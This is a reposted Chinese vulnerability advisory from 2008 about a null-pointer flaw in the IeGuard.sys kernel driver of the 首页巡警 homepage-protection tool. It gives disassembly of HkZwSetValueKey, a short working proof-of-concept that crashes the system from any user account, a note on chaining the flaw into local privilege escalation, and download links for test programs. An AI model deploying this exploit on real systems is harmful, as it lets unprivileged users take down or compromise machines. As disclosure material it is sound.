首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
首页巡警v1.1/1.0 内核驱动 拒绝服务 及 本地提权漏洞
来源:Inking's Blog 作者:Inking 发布时间:2008-05-23  

首页巡警v1.1/1.0的内核驱动程序存在严重漏洞

安装了首页巡警v1.1(v1.0)的机器,任意权限的用户可导致系统蓝屏(BSOD),造成拒绝服务攻击

结合我之前公布的SystemCrashDumpInformation加载驱动方式,可以在安装了HIPS的机器上造成本地提权漏洞,即任意权限的用户可以加载驱动到内核并执行。

出问题的函数是IeGuard.sys!HkZwSetValueKey

该函数的第三个参数是PUNICODE_STRING ValueName

IeGuard没有对参数做任何检查就使用RtlCompareUnicodeString函数对该值进行判断,只要在RING3对此参数置0,IeGuard将立即导致系统蓝屏

相关汇编代码:

.text:00011430 HkZwSetValueKey proc near               ; DATA XREF: HookKeyRoutine+52 o
.text:00011430                                         ; sub_11B66+45 o
.text:00011430
.text:00011430 StartPageUniName= UNICODE_STRING ptr -14h
.text:00011430 var_C           = dword ptr -0Ch
.text:00011430 Object          = dword ptr -8
.text:00011430 isPass          = byte ptr -1
.text:00011430 Handle          = dword ptr 8
.text:00011430 ValueName       = dword ptr 0Ch
.text:00011430 arg_8           = dword ptr 10h
.text:00011430 arg_C           = dword ptr 14h
.text:00011430 arg_10          = dword ptr 18h
.text:00011430 arg_14          = dword ptr 1Ch
.text:00011430
.text:00011430                 mov     edi, edi
.text:00011432                 push    ebp
.text:00011433                 mov     ebp, esp
.text:00011435                 sub     esp, 14h
.text:00011438                 push    ebx
.text:00011439                 xor     ebx, ebx
.text:0001143B                 mov     [ebp+isPass], bl
.text:0001143E                 call    ds:ExGetPreviousMode
.text:00011444                 cmp     al, 1
.text:00011446                 jnz     loc_114FA
.text:00011446
.text:0001144C                 push    offset str_StartPage ; SourceString
.text:00011451                 lea     eax, [ebp+StartPageUniName]
.text:00011454                 push    eax             ; DestinationString
.text:00011455                 call    ds:RtlInitUnicodeString
.text:0001145B                 push    1               ; CaseInSensitive
.text:0001145D                 push    [ebp+ValueName] ; String2
.text:00011460                 lea     eax, [ebp+StartPageUniName]
.text:00011463                 push    eax             ; String1
.text:00011464                 call    ds:RtlCompareUnicodeString

<---此处未做任何判断就将ValueName传递给RtlCompareUnicodeString

导致蓝屏

.text:0001146A                 test    eax, eax
.text:0001146C                 jnz     loc_114FA

利用代码(该代码运行后即可导致安装了首页巡警的机器立即蓝屏,可在任意用户权限下执行)

HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwSetValueKey");
__asm
{
   push 0
   push 0
   push 0
   push 0
   push 0
   push 0
   call p

}

测试程序下载:

http://www.debugman.com/read.php?tid=1330

或:

http://mj0011.ys168.com/  漏洞演示\IeGuardLeakTest.rar


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·FLASH网马悄然现身互联网
·Oracle数据库软件包远程溢出漏洞
·php escapeshellcmd多字节编码漏
·Yahoo! 助手(3721) ActiveX远程
·QQ Mail跨站脚本漏洞
·Z-blog跨站脚本攻击漏洞
·PHP 168 SQL注射漏洞
·Phpcms 2007 远程文件包含漏洞
·Office漏洞导致访问特定网站执行
·暴风影音2008Beta1 最新远程溢出
·sablog 1.6 多个跨站漏洞
·Z-blog又一严重跨站脚本攻击漏洞
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved